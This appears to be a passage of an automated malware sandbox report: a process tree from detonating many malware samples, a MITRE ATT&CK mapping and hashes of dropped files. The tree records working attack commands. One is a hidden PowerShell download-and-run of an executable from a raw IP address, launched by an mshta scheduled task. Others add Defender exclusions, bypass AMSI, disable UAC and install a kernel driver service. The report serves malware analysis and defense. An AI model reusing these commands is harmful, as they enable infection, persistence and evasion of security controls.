        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7732
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:7824
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
        7⤵
        
        PID:11776
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        
        PID:11796
        
        C:\Users\Admin\AppData\Local\Temp\{59c864c0-f2fa-45ce-98f1-0bfd98ddbb44}\325d6e80.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{59c864c0-f2fa-45ce-98f1-0bfd98ddbb44}\325d6e80.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        8⤵
        
        PID:13516
        
        C:\Users\Admin\AppData\Local\Temp\{d371e5ce-6dc2-43ce-995c-54e38b1f6933}\7b1568c5.exe
        
        C:/Users/Admin/AppData/Local/Temp/{d371e5ce-6dc2-43ce-995c-54e38b1f6933}/\7b1568c5.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:11484
    - - C:\Users\Admin\AppData\Local\Temp\a\Service.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
        5⤵
        
        PID:4692
    - - C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe"
        5⤵
        
        PID:10112
      - C:\Program Files\Google\Chrome\Application\ntladlklthawd.exe
        
        "C:\Program Files\Google\Chrome\Application\ntladlklthawd.exe" -
        6⤵
        
        PID:7496
      - C:\Program Files (x86)\Microsoft\Edge\Application\ntladlklthawd.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\ntladlklthawd.exe" -
        6⤵
        
        PID:4900
    - - C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe"
        5⤵
        
        PID:8472
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8472 -s 948
        6⤵
        Program crash
        
        PID:9660
    - - C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe"
        5⤵
        
        PID:13060
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\372b209e3e76f5fc\ScreenConnect.ClientSetup.msi"
        6⤵
        
        PID:12532
    - - C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe"
        5⤵
        
        PID:13560
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 13560 -s 916
        6⤵
        Program crash
        
        PID:13796
    - - C:\Users\Admin\AppData\Local\Temp\a\random.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
        5⤵
        
        PID:13864
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn XEOaemaaoQd /tr "mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        
        PID:13900
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn XEOaemaaoQd /tr "mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7948
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\9UpV8WfJx.hta
        6⤵
        
        PID:13928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'APF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10620
        
        C:\Users\Admin\AppData\Local\TempAPF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE
        
        "C:\Users\Admin\AppData\Local\TempAPF1VYUA0D5N7X09GEHSE6BXXGDKQFM0.EXE"
        8⤵
        
        PID:10668
    - - C:\Users\Admin\AppData\Local\Temp\a\si.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\si.exe"
        5⤵
        
        PID:13956
    - - C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\CrSpoof.exe"
        5⤵
        
        PID:14280
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd /c "botnet.bat"
        6⤵
        
        PID:7724
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "& { Add-MpPreference -ExclusionPath \"$env:TEMP\"; Add-MpPreference -ExclusionPath \"$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\" }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$amsi=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils'); $field=$amsi.GetField('amsiInitFailed','NonPublic,Static'); $field.SetValue($null,$true);"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6264
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 0.1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:6644
- C:\Users\Admin\AppData\Local\Temp\malware.exe
  "C:\Users\Admin\AppData\Local\Temp\malware.exe"
  2⤵
  PID:1036
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 236
    3⤵
    - Program crash
    PID:1016
- C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
  2⤵
  PID:5960
- C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
  "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
  2⤵
  PID:2212
- C:\Users\Admin\AppData\Local\Temp\NetWire.exe
  "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
  2⤵
  PID:4608
- - C:\Users\Admin\AppData\Local\Temp\NetWire.exe
    "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
    3⤵
    PID:3456
- C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
  2⤵
  PID:3400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3400 -s 1720
    3⤵
    - Program crash
    PID:3404
- C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
  "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
  2⤵
  PID:620
- C:\Users\Admin\AppData\Local\Temp\Remcos.exe
  "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
  2⤵
  PID:3300
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    3⤵
    PID:6848
  - - C:\Windows\SysWOW64\PING.EXE
      PING 127.0.0.1 -n 2
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:5884
  - - C:\Windows\SysWOW64\Userdata\Userdata.exe
      "C:\Windows\SysWOW64\Userdata\Userdata.exe"
      4⤵
      PID:11020
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:11052
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
        PID:11240
    - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
        
        "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
        5⤵
        
        PID:11064
- C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe
  "C:\Users\Admin\AppData\Local\Temp\Totally A Safe File.exe"
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn PeJofmaR3uC /tr "mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    PID:1016
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn PeJofmaR3uC /tr "mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:960
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\Cr0365mwr.hta
    3⤵
    PID:3684
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6420
    - - C:\Users\Admin\AppData\Local\TempJFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE
        
        "C:\Users\Admin\AppData\Local\TempJFFJVX4LRLAKWT0W2IAMITCWSQ41CMOV.EXE"
        5⤵
        
        PID:2948
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        
        PID:8560
        
        C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10336600101\apple.exe"
        7⤵
        
        PID:9596
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe"
        8⤵
        
        PID:10476
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F1C2.tmp\F1C3.tmp\F1C4.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        9⤵
        
        PID:11040
        
        C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        10⤵
        
        PID:11068
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13B2.tmp\13B3.tmp\13B4.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        11⤵
        
        PID:6528
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        12⤵
        Launches sc.exe
        
        PID:8004
        
        C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337510101\f73ae_003.exe"
        7⤵
        
        PID:8312
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8132
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        8⤵
        
        PID:5532
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        9⤵
        
        PID:276
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        9⤵
        
        PID:1500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10337540121\am_no.cmd" "
        7⤵
        
        PID:10900
        
        C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe"
        7⤵
        
        PID:11408
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337610101\7fb3004e1b.exe"
        8⤵
        
        PID:9968
        
        C:\Users\Admin\AppData\Local\Temp\10337630101\a3b38bfdd3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337630101\a3b38bfdd3.exe"
        7⤵
        
        PID:9696
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:9360
        
        C:\Users\Admin\AppData\Local\Temp\10337640101\bbcb1a84d6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337640101\bbcb1a84d6.exe"
        7⤵
        
        PID:7348
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\10337650101\cb8b56657e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337650101\cb8b56657e.exe"
        7⤵
        
        PID:13084
        
        C:\Users\Admin\AppData\Local\Temp\10337660101\c3156fcc20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337660101\c3156fcc20.exe"
        7⤵
        
        PID:12432
        
        C:\Users\Admin\AppData\Local\Temp\10337670101\57044dbafa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337670101\57044dbafa.exe"
        7⤵
        
        PID:13856
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        8⤵
        Kills process with taskkill
        
        PID:11532
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        8⤵
        Kills process with taskkill
        
        PID:9492
        
        C:\Users\Admin\AppData\Local\Temp\10337680101\b1e45333d9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10337680101\b1e45333d9.exe"
        7⤵
        
        PID:6400
- C:\Users\Admin\AppData\Local\Temp\putty.exe
  "C:\Users\Admin\AppData\Local\Temp\putty.exe"
  2⤵
  PID:2492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8ACB.tmp\putty.bat" "C:\Users\Admin\AppData\Local\Temp\putty.exe""
    3⤵
    PID:5780
- C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\TrollRAT.exe"
  2⤵
  PID:6464
- C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe
  "C:\Users\Admin\AppData\Local\Temp\Unconfirmed 78105.crdownload.exe"
  2⤵
  PID:6720
- C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe
  "C:\Users\Admin\AppData\Local\Temp\Josh Bogler.exe"
  2⤵
  PID:7020

C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe C:\Users\Admin 0
1⤵
PID:1064

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d8 0x464
1⤵
PID:3816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1900 -ip 1900
1⤵
PID:2176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5764 -ip 5764
1⤵
PID:2124

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:5828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 4584 -ip 4584
1⤵
PID:2576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1036 -ip 1036
1⤵
PID:3404

C:\Windows\SysWOW64\sysaeiu.exe
C:\Windows\SysWOW64\sysaeiu.exe
1⤵
PID:4832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4584 -ip 4584
1⤵
PID:6984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 3400 -ip 3400
1⤵
PID:3160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4584 -ip 4584
1⤵
PID:6992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 4584 -ip 4584
1⤵
PID:6392

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
PID:2428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 7188 -ip 7188
1⤵
PID:8292

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7224

C:\ProgramData\wxjurcj\qums.exe
C:\ProgramData\wxjurcj\qums.exe start2
1⤵
PID:9072
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 9072 -s 468
  2⤵
  - Program crash
  PID:6512

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:10868
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A74CB712F95DF8901AAD93FCD698C2FE C
  2⤵
  PID:10864
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A312CBC617B2501886F9EF5CEF266749 C
  2⤵
  PID:13000
- - C:\Windows\SysWOW64\rundll32.exe
    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSID126.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240702531 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
    3⤵
    PID:13476
- C:\Windows\system32\srtasks.exe
  C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
  2⤵
  PID:10176
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 8182D1FDB7F3C7EF3C6D4C53CC638F16
  2⤵
  PID:11664
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 9286EFADB2D90803672755AEC89A161F E Global\MSI0000
  2⤵
  PID:11904

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:10100

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
1⤵
PID:14016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 8472 -ip 8472
1⤵
PID:9056

C:\Drivers\MnCPLj3GUe7a.exe
C:\Drivers\MnCPLj3GUe7a.exe
1⤵
PID:7996

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:3096

C:\Windows\SysWOW64\fontdrvhost.exe
"C:\Windows\System32\fontdrvhost.exe"
1⤵
PID:12772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 13560 -ip 13560
1⤵
PID:13764

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 9644 -ip 9644
1⤵
PID:220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9072 -ip 9072
1⤵
PID:1196

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:7536

C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
C:\Users\Admin\AppData\Roaming\RtkAudUService64.exe
1⤵
PID:2016

C:\Program Files\taskhostw.exe
"C:\Program Files\taskhostw.exe"
1⤵
PID:6804

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6800

C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.ClientService.exe
"C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-urtop2-relay.screenconnect.com&p=443&s=73c2c562-1ab7-44a0-9101-522d9d85d29f&k=BgIAAACkAABSU0ExAAgAAAEAAQA9K7uS4%2fJVRDhzrMRt3pY6%2bxa%2fWKGgbJVaIahWYGuROtDJUZB8VSeD7DHf%2b8aOsnPl2CbtVbiJwbaD6nnXySt2YflS6XozE0%2f5hPBnLZJfYDCyrmEn0LXwquWOHOluXF8M7XU6gFJrHp%2feD6q5VGg%2bJ%2bCdmN%2bEY4Q%2blwhRQbdNWysuWl93nwX%2fdz9KA%2bK2YrFXwCUDTe7tw7ULGHizb%2fmpnhNUdEwU6J%2bZ11E7GrxtRf0yn2xVMBKTGmTmRmp51vBb2sfGIau4PatgWQrq0A4FnyPrBsvJKBkz2M%2fjTy4L7fWW0eTYcUkstqMaAe6tYvGNeOt0%2bOljpuYQK%2fsnaN%2fY"
1⤵
PID:8208
- C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.WindowsClient.exe
  "C:\Program Files (x86)\ScreenConnect Client (372b209e3e76f5fc)\ScreenConnect.WindowsClient.exe" "RunRole" "1c84aeb6-9b08-44ac-bafe-fcc009adaffe" "User"
  2⤵
  PID:12640

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:8168

C:\Drivers\MnCPLj3GUe7a.exe
C:\Drivers\MnCPLj3GUe7a.exe
1⤵
PID:14264

C:\Users\Admin\AppData\Roaming\AggregatorHostsss
C:\Users\Admin\AppData\Roaming\AggregatorHostsss
1⤵
PID:7936

C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
C:\Users\Admin\AppData\Roaming\WindowsSessionUpdate
1⤵
PID:6708

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e592ef7.rbs

Filesize
214KB

MD5
55dd3909914d23268412b8b727febc11

SHA1
dfe6ec5f55f78de45731513cb71ccc75722172e0

SHA256
90c74af890cdfd2f1345d0797a01a52fd137ead922266a6d69c04c51bcf372a3

SHA512
6dd49896e4fdda8c1dae80a3badbeed3dfb0fbfebf341bed566137f1a96f2d5fb79f4af813854a6ea53927d031040fa7a4821ca3f285bb7852ca7c4d8532c965

Download Submit
C:\Drivers\MnCPLj3GUe7a.exe

Filesize
2.3MB

MD5
21df28dbd77ab95b9da7b5ecc1ff9214

SHA1
fba7b138903da9a6b0aa9242790f3f45163c5cd1

SHA256
e109a1944d919b3de7d1381c79ec1a1b479d4e27dd5a19e17dd2e03d4dc18d4c

SHA512
b70298bef7d0f2c0b041a0fd4df8f17aed23f806bd4e0ecea95735413e9d0002a76ecf01bfb595e3da804870208c3b5cd1c48d874796db03b3505cd0a58f3d34

Download Submit
C:\Program Files (x86)\Microsoft\Edge\Application\ntladlklthawd.exe

Filesize
3.1MB

MD5
6458162bb12fe032d99795e4301c1c49

SHA1
41e42ecd45f58b6cea1ee4891afd60fb913831b7

SHA256
fdf471649ef052e9a1c5b1f10c7c15f43f6df548e3cad8299ff5317abffb3899

SHA512
1d5f3725faffb97c3651e29f8ef2f987d9143cba0128424120ba81d23253fd81521d5fedb6513bf7eb1ff88014c3bf516e1b87581f1f150de751d36f2861fba5

Download Submit
C:\Program Files\Google\Chrome\Application\Chrome_boostrap.exe

Filesize
37KB

MD5
af69d667761ef87674be3d231a0ae0e6

SHA1
a938c72cfd162d097391d3f53f0097fda5a9543f

SHA256
55b2905b08f0715379db90291712363f16a80b3bfb33513012cb9ac7cbff4343

SHA512
32a1994162bb873da35f99816b8740b61e8f9b5a3e22e4aa19704848b4760208f23989f174822669a3105719647c3db9145ae0a227cf41d967d50935da66c4ab

Download Submit
C:\ProgramData\Hdlharas\dlrarhsiva.exe

Filesize
9.1MB

MD5
64261d5f3b07671f15b7f10f2f78da3f

SHA1
d4f978177394024bb4d0e5b6b972a5f72f830181

SHA256
87f51b4632c5fbc351a59a234dfefef506d807f2c173aac23162b85d0d73c2ad

SHA512
3a9ff39e6bc7585b0b03f7327652e4c3b766563e8b183c25b6497e30956945add5684f1579862117e44c6bac2802601fc7c4d2a0daa1824f16c4da1fd6c9c91a

Download Submit
C:\ProgramData\Hdlharas\mdkhm.zip

Filesize
56KB

MD5
b635f6f767e485c7e17833411d567712

SHA1
5a9cbdca7794aae308c44edfa7a1ff5b155e4aa8

SHA256
6838286fb88e9e4e68882601a13fa770f1b510a0a86389b6a29070a129bf2e5e

SHA512
551ba05bd44e66685f359802b35a8c9775792a12844906b4b53e1a000d56624c6db323754331c9f399072790991c1b256d9114a50fb78111652a1c973d2880af

Download Submit
C:\Users\Admin\AppData\Local\AdvinstAnalytics\67d743c3687d362f387c47f6\1.0.1\{AB82A9DD-88FE-4973-A75D-B68FC20B7006}.session

Filesize
32KB

MD5
82560870ab6ff09069f9ef9e38b1bfa7

SHA1
91f0c4b421e3164a50793961cb17e6d1d0583416

SHA256
19b3bfd9b153b4681dbce997d8599c71bc47cb152e15d45d43f3df84963d76db

SHA512
4a8ff661298918b17f733c087f220634dca9f972c6eb7f11240a2e5d7a84fcea2a1963431e8d5a56ced638d41bf8463e88026d6cf683da4b0c3fe408bb7bfa7e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
